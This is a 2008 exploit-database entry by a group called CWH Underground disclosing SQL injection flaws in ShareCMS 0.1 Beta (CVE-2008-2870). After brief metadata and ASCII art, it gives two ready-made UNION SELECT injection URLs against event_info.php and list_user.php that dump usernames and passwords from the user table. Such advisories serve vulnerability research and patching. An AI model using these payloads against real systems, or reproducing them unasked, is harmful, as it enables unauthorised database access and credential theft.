ShareCMS 0.1 - Multiple SQL Injections

Author: CWH Underground
type: webapps
platform: php
port: 
date_added: 2008-06-23 
date_updated: 2016-12-09 
verified: 1 
codes: OSVDB-46795;CVE-2008-2870;OSVDB-46794 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comshareCMS_0.1_beta.tar.gz

==============================================================
  ShareCMS 0.1 Multiple Remote SQL Injection Vulnerabilities
==============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /
  / XXXXXX /
 (________(
  `------'


AUTHOR : CWH Underground
DATE   : 24 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : ShareCMS
 VERSION     : 0.1 Beta
 VENDOR      : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/sharecms
#####################################################

--- Remote SQL Injection ---

----------
 Exploits
----------

[+] http://[Target]/[sharecms_path]/event_info.php?eventID[SQL Injection]
[+] http://[Target]/[sharecms_path]/list_user.php?userID=[SQL Injection]

--------------
 POC Exploits
--------------

[+] http://192.168.24.25/sharecms/event_info.php?eventID=-9999/**/UNION/**/SELECT/**/1,2,3,username,5,6,7,8,9,10,11,12,password/**/FROM/**/user--
[+] http://192.168.24.25/sharecms/list_user.php?userID=-9999/**/UNION/**/SELECT/**/1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11/**/FROM/**/user--


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-24]